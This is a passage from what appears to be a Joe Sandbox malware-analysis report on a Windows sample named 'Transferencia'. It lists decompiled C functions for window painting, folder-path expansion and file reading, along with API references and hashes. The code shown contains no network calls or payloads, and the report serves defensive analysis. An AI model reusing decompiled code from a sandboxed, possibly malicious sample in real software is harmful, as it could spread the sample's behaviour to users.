                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                                                • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x7a8a98 + _t44 * 2;
                                                				_t45 = 0x7a6a00;
                                                				_t108 = 0x7a6a00;
                                                				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E0040651A(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x7a6a00;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = (_t78 << 0xb) + 0x7a9000;
                                                								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
                                                							} else {
                                                								E00406461(_t108,  *0x7a8a68);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E004067A1(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x7a8ae4 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x7a8a64;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E00406557(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x00406557
                                                0x00406557
                                                0x00406557
                                                0x0040655d
                                                0x00406562
                                                0x00406573
                                                0x00406573
                                                0x0040657b
                                                0x0040657c
                                                0x0040657d
                                                0x0040657e
                                                0x00406581
                                                0x00406589
                                                0x0040658b
                                                0x0040659c
                                                0x0040659f
                                                0x0040659f
                                                0x004065a3
                                                0x004065a9
                                                0x004065ac
                                                0x00406787
                                                0x00406787
                                                0x00406792
                                                0x0040679e
                                                0x0040679e
                                                0x00000000
                                                0x004065b2
                                                0x004065b7
                                                0x004065cc
                                                0x004065cd
                                                0x004065d3
                                                0x00406765
                                                0x00406773
                                                0x00406776
                                                0x00406776
                                                0x00406767
                                                0x0040676a
                                                0x0040676d
                                                0x0040676f
                                                0x0040676f
                                                0x00406778
                                                0x00406778
                                                0x0040677e
                                                0x00406781
                                                0x004065b4
                                                0x00000000
                                                0x004065b4
                                                0x00000000
                                                0x00406781
                                                0x004065d9
                                                0x004065dc
                                                0x004065eb
                                                0x004065f2
                                                0x004065fe
                                                0x00406601
                                                0x00406604
                                                0x00406605
                                                0x0040660a
                                                0x00406610
                                                0x00406613
                                                0x00406616
                                                0x00406709
                                                0x0040670e
                                                0x00406741
                                                0x00406746
                                                0x0040674b
                                                0x00406750
                                                0x00406750
                                                0x00406755
                                                0x0040675b
                                                0x0040675e
                                                0x00000000
                                                0x0040675e
                                                0x00406710
                                                0x00406713
                                                0x00406716
                                                0x0040672b
                                                0x00406732
                                                0x00406718
                                                0x0040671f
                                                0x0040671f
                                                0x0040673a
                                                0x0040673d
                                                0x00406701
                                                0x00406702
                                                0x00406702
                                                0x00000000
                                                0x0040673d
                                                0x00406623
                                                0x00406627
                                                0x00406627
                                                0x00406628
                                                0x0040662a
                                                0x00406667
                                                0x0040666a
                                                0x0040667a
                                                0x0040667d
                                                0x00406685
                                                0x0040668b
                                                0x0040668b
                                                0x004066e6
                                                0x004066e6
                                                0x004066e8
                                                0x00000000
                                                0x00000000
                                                0x0040668f
                                                0x00406694
                                                0x00406695
                                                0x00406697
                                                0x004066ae
                                                0x004066bc
                                                0x004066c2
                                                0x004066c4
                                                0x004066e2
                                                0x004066e2
                                                0x004066e2
                                                0x00000000
                                                0x004066e2
                                                0x004066ca
                                                0x004066d3
                                                0x004066d6
                                                0x004066dc
                                                0x004066e0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066e0
                                                0x004066a8
                                                0x004066aa
                                                0x004066ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066ac
                                                0x00000000
                                                0x004066e6
                                                0x00406672
                                                0x00000000
                                                0x0040662c
                                                0x0040664a
                                                0x00406653
                                                0x004066f0
                                                0x004066f4
                                                0x004066fc
                                                0x004066fc
                                                0x00000000
                                                0x004066f4
                                                0x0040665d
                                                0x004066ea
                                                0x004066ee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066ee
                                                0x0040662a
                                                0x00000000
                                                0x004065b7

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079F570,76CDEA30), ref: 00406685
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-1230650788
                                                • Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                                                • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                                                • Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                                                • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x004044ef
                                                0x004045a5
                                                0x00000000
                                                0x004045a5
                                                0x00404500
                                                0x00404504
                                                0x00000000
                                                0x0040451e
                                                0x0040451e
                                                0x00404527
                                                0x00000000
                                                0x00000000
                                                0x00404529
                                                0x00404535
                                                0x00404538
                                                0x00404538
                                                0x0040453e
                                                0x00404544
                                                0x00404544
                                                0x00404550
                                                0x00404556
                                                0x0040455d
                                                0x00404560
                                                0x00404563
                                                0x00404565
                                                0x00404565
                                                0x0040456d
                                                0x00404573
                                                0x00404573
                                                0x0040457d
                                                0x00404582
                                                0x00404585
                                                0x0040458a
                                                0x0040458d
                                                0x0040458d
                                                0x0040459d
                                                0x0040459d
                                                0x00000000
                                                0x004045a0

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                                                • GetSysColor.USER32(00000000), ref: 00404538
                                                • SetTextColor.GDI32(?,00000000), ref: 00404544
                                                • SetBkMode.GDI32(?,?), ref: 00404550
                                                • GetSysColor.USER32(?), ref: 00404563
                                                • SetBkColor.GDI32(?,?), ref: 00404573
                                                • DeleteObject.GDI32(?), ref: 0040458D
                                                • CreateBrushIndirect.GDI32(?), ref: 00404597
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406101
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
